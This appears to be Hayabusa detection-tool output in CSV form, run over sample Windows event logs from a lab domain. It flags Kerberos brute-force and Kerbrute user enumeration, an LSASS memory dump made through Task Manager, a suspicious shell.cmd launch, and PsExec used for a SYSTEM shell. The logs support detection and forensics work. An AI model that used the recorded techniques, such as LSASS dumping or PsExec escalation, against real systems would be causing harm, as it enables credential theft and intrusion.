2021-12-02 23:48:17.323 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vdr | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.327 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tc | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.331 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: syvsdy | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.334 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: s | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.337 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ysy | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.341 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vrat | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.344 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vay | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.348 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vs | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.351 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: uydzry | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.354 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rey | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.357 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vase | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.360 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ryver | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.363 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: yvsyv | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.367 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: srey | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.370 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: b aer | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.373 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: yvas | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.376 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tbyt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.379 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: nini | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.382 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ugu | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.385 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,"User: m,og | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -",rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.389 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: go | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.392 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: nd | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.395 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: bdcy | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.398 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rec | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.401 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: xt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.405 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: accrt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.408 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: wyt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.410 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: xc | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.413 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.416 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ytuntsr | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.420 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vga | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.423 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tfay | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.426 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: sef | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.430 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: gsdf | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.433 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: sfs | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:23.180 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: HealthMailboxf49e2c8 | Svc: krbtgt | IP Addr: ::ffff:10.23.42.16 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-03 21:06:03.488 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: Administrator | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:03.493 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: Guest | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:03.497 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: DefaultAccount | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:03.510 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: krbtgt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:03.847 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admmig | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:04.904 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: Test-ADM | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:04.910 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admin-test | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:06.986 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: $P51000-50I28MP5JB3E | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:07.006 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_27d255b6407743b08 | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:07.010 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_2b6f1a51ac6c41b2a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:07.014 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_25e3b4425ffd47aab | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:07.021 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_8b9faa99d83446d1b | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:07.031 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_6aaeeb113c0c4af3a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:07.035 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_2f6964c8f421408ab | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:07.047 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_374806bcc65140a5a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:07.052 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_b2a35e76f50a4c23a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:07.056 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_957258b5879242afb | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:11.514 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: hack1 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:11.878 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: hacker2 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-03 21:06:12.553 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: dsrm | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
2021-12-05 05:59:31.403 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\SYSTEM32\cmd.exe /c ""C:\tools\shell.cmd"" | Path: C:\Windows\System32\cmd.exe | PID: 0x13a4 | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-Task Manager access indicator for potential LSASS dump.evtx
2021-12-05 06:10:40.723 +09:00,fs03vuln.offsec.lan,11,info,,File Created,Path: C:\Users\admmig\AppData\Local\Temp\lsass (4).DMP | Process: C:\Windows\System32\Taskmgr.exe | PID: 3504 | PGUID: A57649D1-D6B1-61AB-A5E4-D70100000000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-LSASS credentials dump via Task Manager.evtx
2021-12-05 06:10:40.723 +09:00,fs03vuln.offsec.lan,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-LSASS credentials dump via Task Manager.evtx
2021-12-05 06:10:40.723 +09:00,fs03vuln.offsec.lan,11,high,CredAccess,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-LSASS credentials dump via Task Manager.evtx
2021-12-05 06:19:16.741 +09:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1035,technique_name=Service Execution | Cmd: PsExec64.exe -i -s cmd | Process: C:\TOOLS\PsExec64.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x83ef56 | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000 | Hash: SHA1=FB0A150601470195C47B4E8D87FCB3F50292BEB2,MD5=9321C107D1F7E336CDA550A2BF049108,SHA256=AD6B98C01EE849874E4B4502C3D7853196F6044240D3271E4AB3FC6E3C08E9A4,IMPHASH=159D56D406180A332FBC99290F30700E",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
2021-12-05 06:19:16.757 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1035,technique_name=Service Execution | SetValue: HKU\S-1-5-21-4230534742-2542757381-3142984815-1111\Software\Sysinternals\PsExec\EulaAccepted: DWORD (0x00000001) | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
